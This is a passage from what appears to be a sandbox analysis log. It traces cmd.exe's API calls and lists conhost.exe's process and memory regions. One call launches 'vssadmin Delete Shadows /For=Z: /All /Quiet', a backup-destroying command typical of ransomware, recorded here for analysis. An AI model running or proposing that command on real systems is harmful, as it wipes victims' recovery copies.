	[0236.362] RtlSizeHeap (HeapHandle=0x4640000, Flags=0x0, MemoryPointer=0x46405c8) returned 0x56
	[0236.362] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0236.363] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0236.363] GetProcessHeap () returned 0x4640000
	[0236.363] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x182) returned 0x4649390
	[0236.363] GetProcessHeap () returned 0x4640000
	[0236.363] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x2fc) returned 0x4640628
	[0236.394] GetProcessHeap () returned 0x4640000
	[0236.394] RtlReAllocateHeap (Heap=0x4640000, Flags=0x0, Ptr=0x4640628, Size=0x184) returned 0x4640628
	[0236.394] GetProcessHeap () returned 0x4640000
	[0236.394] RtlSizeHeap (HeapHandle=0x4640000, Flags=0x0, MemoryPointer=0x4640628) returned 0x184
	[0236.394] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0236.394] GetProcessHeap () returned 0x4640000
	[0236.394] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0xe0) returned 0x4649520
	[0236.671] GetProcessHeap () returned 0x4640000
	[0236.671] RtlReAllocateHeap (Heap=0x4640000, Flags=0x0, Ptr=0x4649520, Size=0x76) returned 0x4649520
	[0236.671] GetProcessHeap () returned 0x4640000
	[0236.671] RtlSizeHeap (HeapHandle=0x4640000, Flags=0x0, MemoryPointer=0x4649520) returned 0x76
	[0236.672] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0236.673] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eee8) returned 0xffffffff
	[0236.674] GetLastError () returned 0x2
	[0236.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0236.674] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eee8) returned 0xffffffff
	[0236.675] GetLastError () returned 0x2
	[0236.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0236.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eee8) returned 0x46495a0
	[0236.676] GetProcessHeap () returned 0x4640000
	[0236.676] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x0, Size=0x14) returned 0x46479b0
	[0236.676] FindClose (in: hFindFile=0x46495a0 | out: hFindFile=0x46495a0) returned 1
	[0236.677] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18eee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eee8) returned 0xffffffff
	[0236.677] GetLastError () returned 0x2
	[0236.677] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18eee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eee8) returned 0x46495a0
	[0236.677] GetProcessHeap () returned 0x4640000
	[0236.677] RtlReAllocateHeap (Heap=0x4640000, Flags=0x0, Ptr=0x46479b0, Size=0x4) returned 0x4647520
	[0236.677] FindClose (in: hFindFile=0x46495a0 | out: hFindFile=0x46495a0) returned 1
	[0236.678] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0236.678] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0236.678] GetConsoleTitleW (in: lpConsoleTitle=0x18f3dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0237.197] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f308, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f2ec | out: lpAttributeList=0x18f308, lpSize=0x18f2ec) returned 1
	[0237.197] UpdateProcThreadAttribute (in: lpAttributeList=0x18f308, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f2f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f308, lpPreviousValue=0x0) returned 1
	[0237.198] GetStartupInfoW (in: lpStartupInfo=0x18f340 | out: lpStartupInfo=0x18f340*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0237.198] GetProcessHeap () returned 0x4640000
	[0237.198] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x18) returned 0x4647bf0
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0237.198] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.199] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0237.200] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0237.201] GetProcessHeap () returned 0x4640000
	[0237.201] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x4647bf0) returned 1
	[0237.201] GetProcessHeap () returned 0x4640000
	[0237.201] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0xa) returned 0x4647530
	[0237.201] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0237.204] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=Z: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f290*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=Z: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f2dc | out: lpCommandLine="vssadmin  Delete Shadows /For=Z: /All /Quiet ", lpProcessInformation=0x18f2dc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x12a4, dwThreadId=0x1024)) returned 1
	[0237.229] CloseHandle (hObject=0xa4) returned 1
	[0237.230] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0237.230] GetProcessHeap () returned 0x4640000
	[0237.230] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x464adf0) returned 1
	[0237.230] GetEnvironmentStringsW () returned 0x464a248*
	[0237.230] GetProcessHeap () returned 0x4640000
	[0237.230] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0xb9c) returned 0x464adf0
	[0237.230] memcpy (in: _Dst=0x464adf0, _Src=0x464a248, _Size=0xb9c | out: _Dst=0x464adf0) returned 0x464adf0
	[0237.230] FreeEnvironmentStringsA (penv="=") returned 1
	[0237.230] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0256.014] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f274 | out: lpExitCode=0x18f274*=0x2) returned 1
	[0256.016] CloseHandle (hObject=0xa8) returned 1
	[0256.016] _vsnwprintf (in: _Buffer=0x18f35c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f27c | out: _Buffer="00000002") returned 8
	[0256.017] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0256.018] GetProcessHeap () returned 0x4640000
	[0256.018] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x464adf0) returned 1
	[0256.018] GetEnvironmentStringsW () returned 0x464a248*
	[0256.019] GetProcessHeap () returned 0x4640000
	[0256.019] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0xbc2) returned 0x464c568
	[0256.019] memcpy (in: _Dst=0x464c568, _Src=0x464a248, _Size=0xbc2 | out: _Dst=0x464c568) returned 0x464c568
	[0256.019] FreeEnvironmentStringsA (penv="=") returned 1
	[0256.019] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0256.019] GetProcessHeap () returned 0x4640000
	[0256.019] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x464c568) returned 1
	[0256.019] GetEnvironmentStringsW () returned 0x464a248*
	[0256.020] GetProcessHeap () returned 0x4640000
	[0256.020] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0xbc2) returned 0x464c568
	[0256.020] memcpy (in: _Dst=0x464c568, _Src=0x464a248, _Size=0xbc2 | out: _Dst=0x464c568) returned 0x464c568
	[0256.020] FreeEnvironmentStringsA (penv="=") returned 1
	[0256.020] GetProcessHeap () returned 0x4640000
	[0256.020] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x4647530) returned 1
	[0256.020] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f308 | out: lpAttributeList=0x18f308) 
	[0256.020] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0256.020] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0256.254] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0256.255] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0256.454] _get_osfhandle (_FileHandle=0) returned 0x38
	[0256.454] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0256.633] SetConsoleInputExeNameW () returned 0x1
	[0256.633] GetConsoleOutputCP () returned 0x1b5
	[0256.883] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0256.883] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0257.011] exit (_Code=2) 

Thread:
	id = 54
	os_tid = 0x1328


Process:
	id = "7"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x5aac7000"
	os_pid = "0x998"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0x12cc"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 599
	        start_va = 0x39a00000
	          end_va = 0x39bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000039a00000"
	        filename = ""

Region:
	              id = 600
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 601
	        start_va = 0x41798e0000
	          end_va = 0x417991ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000041798e0000"
	        filename = ""

Region:
	              id = 602
	        start_va = 0x4179a00000
	          end_va = 0x4179bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004179a00000"
	        filename = ""

Region:
	              id = 603
	        start_va = 0x154d4cc0000
	          end_va = 0x154d4cdffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4cc0000"
	        filename = ""

Region:
	              id = 604
	        start_va = 0x154d4ce0000
	          end_va = 0x154d4cf4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4ce0000"
	        filename = ""

Region:
	              id = 605
	        start_va = 0x7df5ff8e0000
	          end_va = 0x7ff5ff8dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff8e0000"
	        filename = ""

Region:
	              id = 606
	        start_va = 0x7ff7ffa00000
	          end_va = 0x7ff7ffa22fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffa00000"
	        filename = ""

Region:
	              id = 607
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 608
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 609
	        start_va = 0x154d4d00000
	          end_va = 0x154d4e8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d00000"
	        filename = ""

Region:
	              id = 610
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 615
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 616
	        start_va = 0x154d4cc0000
	          end_va = 0x154d4ccffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4cc0000"
	        filename = ""

Region:
	              id = 617
	        start_va = 0x7ff7ff900000
	          end_va = 0x7ff7ff9fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff900000"
	        filename = ""

Region:
	              id = 618
	        start_va = 0x154d4e90000
	          end_va = 0x154d4f4dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 619
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 644
	        start_va = 0x4179920000
	          end_va = 0x417995ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004179920000"
	        filename = ""

Region:
	              id = 645
	        start_va = 0x154d4f50000
	          end_va = 0x154d50affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4f50000"
	        filename = ""

Region:
	              id = 646
	        start_va = 0x154d4cd0000
	          end_va = 0x154d4cd6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4cd0000"
	        filename = ""

Region:
	              id = 647
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 648
	        start_va = 0x154d4d00000
	          end_va = 0x154d4d00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4d00000"
	        filename = ""

Region:
	              id = 649
	        start_va = 0x154d4d90000
	          end_va = 0x154d4e8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d90000"
	        filename = ""

Region:
	              id = 650
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 651
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 652
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 653
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 654
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 655
	        start_va = 0x154d4d10000
	          end_va = 0x154d4d16fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d10000"
	        filename = ""

Region:
	              id = 656
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 662
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 663
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 664
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 665
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 698
	        start_va = 0x154d4d20000
	          end_va = 0x154d4d20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d20000"
	        filename = ""

Region:
	              id = 699
	        start_va = 0x154d4d30000
	          end_va = 0x154d4d30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d30000"
	        filename = ""

Region:
	              id = 700
	        start_va = 0x154d50b0000
	          end_va = 0x154d5237fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d50b0000"
	        filename = ""

Region:
	              id = 701
	        start_va = 0x154d5240000
	          end_va = 0x154d53c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d5240000"
	        filename = ""

Region:
	              id = 702
	        start_va = 0x154d53d0000
	          end_va = 0x154d67cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d53d0000"
	        filename = ""

Region:
	              id = 703
	        start_va = 0x154d4d40000
	          end_va = 0x154d4d5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d40000"
	        filename = ""

Region:
	              id = 730
	        start_va = 0x4179960000
	          end_va = 0x417999ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004179960000"
	        filename = ""

Region:
	              id = 731
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 732
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 753
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 754
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 755
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 756
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 757
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 758
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 759
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 780
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 781
	        start_va = 0x154d4f50000
	          end_va = 0x154d503ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4f50000"
	        filename = ""

Region:
	              id = 782
	        start_va = 0x154d50a0000
	          end_va = 0x154d50affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d50a0000"
	        filename = ""

Region:
